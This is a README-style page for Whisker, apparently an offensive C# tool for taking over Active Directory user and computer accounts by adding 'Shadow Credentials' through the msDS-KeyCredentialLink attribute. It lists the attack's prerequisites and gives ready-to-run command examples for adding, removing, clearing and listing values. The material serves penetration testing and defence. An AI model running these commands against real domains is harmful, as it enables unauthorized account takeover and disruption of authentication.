Home

Awesome

Whisker

Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.

This tool is based on code from DSInternals by Michael Grafnetter (@MGrafnetter).

For this attack to succeed, the environment must have a Domain Controller running at least Windows Server 2016, and the Domain Controller must have a server authentication certificate to allow for PKINIT Kerberos authentication.

More details are available at the post Shadow Credentials: Abusing Key Trust Account Mapping for Takeover.

Usage

Add a new value to the msDS-KeyCredentialLink attribute of a target object:

Example: Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1

Remove a value from the msDS-KeyCredentialLink attribute of a target object:

Example: Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /deviceid:2de4643a-2e0b-438f-a99d-5cb058b3254b

Clear all the values of the the msDS-KeyCredentialLink attribute of a target object:

Example: Whisker.exe clear /target:computername$ /domain:constoso.local /dc:dc1.contoso.local

⚠️ Warning: Clearing the msDS-KeyCredentialLink attribute of accounts configured for passwordless authentication will cause disruptions.

List all the values of the the msDS-KeyCredentialLink attribute of a target object:

Example: Whisker.exe list /target:computername$ /domain:constoso.local /dc:dc1.contoso.local

References